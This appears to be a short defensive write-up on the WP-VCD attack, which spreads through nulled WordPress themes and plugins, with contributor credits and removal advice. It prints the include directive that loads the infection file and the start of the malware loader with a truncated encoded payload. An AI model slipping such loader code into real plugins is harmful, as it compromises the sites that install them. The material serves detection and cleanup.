Another attack on wordpress 4.8
Visit : Medium ,
Check out the guidelines and Remove above mentioned files to make your wordpress safe.
Let me know, If you find anything suspicious in your wordpress.
If you think, your wordpress is now secure, Please click on Clap button on Medium.
The first thing to understand how to defeat an enemy is to understand it. The cause of WP-VCD attack is a nulled theme or a nulled plugin. Inside the plugin installation file many times is present this directive:
<?php if (file_exists(dirname(__FILE__) . '/class.plugin-modules.php'))
include_once(dirname(__FILE__) . '/class.plugin-modules.php'); ?>
<?php
/*
Plugin Name: Example
Plugin URI: http://example.com/
Author: John Doe
....
*/
That directive load a script that will spread the malware. Opening that file is possible to found the malware code:
<?php
//install_code1
error_reporting(0);
ini_set('display_errors', 0);
DEFINE('MAX_LEVEL', 2);
DEFINE('MAX_ITERATION', 50);
DEFINE('P', $_SERVER['DOCUMENT_ROOT']);
$GLOBALS['WP_CD_CODE'] = 'PDHstAgXchan5E3JlcG9ydG...
So the first step to do in order to defeat the malware is to delete the involved plugin (or at least remove malware code from the plugin).
Edit: On 05/13/2020 As per the R&D, ThejeswarReddy found that,
if you download null theme/plugin and inspect all files with your here mention code there is only folder that causing this issue that is '.settings' folder (usually in the root folder). it contains every file to create this malware, you can safely delete this folder and still the plugin/theme works!!
Rakshit Shah
Gabriele Serra
CodinCafe
ThejeswarReddy
EDIT #1 : (01/08/2018)
If you want to contribute anything about WP-VCD attack, Create a pull request and let's try to make wordpress more secure.